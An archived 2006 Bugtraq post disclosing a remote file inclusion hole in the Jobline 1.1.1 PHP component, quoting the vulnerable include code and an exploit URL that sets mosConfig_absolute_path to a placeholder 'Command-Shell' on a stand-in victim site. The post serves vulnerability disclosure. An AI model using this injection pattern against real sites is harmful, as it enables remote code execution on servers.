| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060613184118.23880.qmail@securityfocus.com>
Date: 13 Jun 2006 18:41:18 -0000
From: SpC-x@...mail.Org
To: bugtraq@...urityfocus.com
Subject: Jobline 1 1 1 Version - Remote File Include Vulnerability
# SaVSaK.CoM | SpC-x - The_BeKiR |
# Jobline 1 1 1 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Jobline
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) {
# include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php");
# } else {
# include_once("$mosConfig_absolute_path/components/$option/language/english.php");
# }
# Vulnerable :
# http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=Command-Shell
Powered by blists - more mailing lists